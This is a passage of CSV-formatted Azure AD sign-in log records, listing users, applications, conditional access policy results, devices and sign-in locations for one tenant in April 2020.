'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 06:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5511ead1-bd0f-42e2-a2c1-d74aa1310c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5511ead1-bd0f-42e2-a2c1-d74aa1310c00,SigninLogs,Sucess,50.6406517,5.572050095
+747,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:13.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b818debc-ee42-4085-9818-1b0f31c5e031,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b16e9c4c-8a98-4eea-b58a-47ad1d600c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b16e9c4c-8a98-4eea-b58a-47ad1d600c00,SigninLogs,Sucess,36.6404686,-78.26995087
+748,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:39.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 06:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5511ead1-bd0f-42e2-a2c1-d74aa1310c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5511ead1-bd0f-42e2-a2c1-d74aa1310c00,SigninLogs,Sucess,50.6406517,5.572050095
+749,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:07.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f3bec3a7-f4e4-40e6-84d4-f4bd67d184de,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c883e3df-3efa-4676-93e1-2d9792dc0d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c883e3df-3efa-4676-93e1-2d9792dc0d00,SigninLogs,Sucess,36.6404686,-78.26995087
+750,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:13.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b818debc-ee42-4085-9818-1b0f31c5e031,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b16e9c4c-8a98-4eea-b58a-47ad1d600c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b16e9c4c-8a98-4eea-b58a-47ad1d600c00,SigninLogs,Sucess,36.6404686,-78.26995087
+751,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:40.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ffc66140-5bc6-47b9-9d75-899979adcc03,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",80d584c4-dd35-4dcb-882c-05934c260c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,80d584c4-dd35-4dcb-882c-05934c260c00,SigninLogs,Sucess,50.6406517,5.572050095
+752,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:32.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:20,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",fead3f67-5867-429a-810f-91a3c7f34300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fead3f67-5867-429a-810f-91a3c7f34300,SigninLogs,Sucess,32.32146072,34.85319901
+753,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:39.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,620e3ec5-542e-44e5-9910-f7ced19fb84d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93ca542e-4eab-45c4-8608-b715d2341100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,93ca542e-4eab-45c4-8608-b715d2341100,SigninLogs,Sucess,33.7984581,-84.38828278
+754,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:40.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5374abba-89aa-4501-9fe6-5fbdfae62cee,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 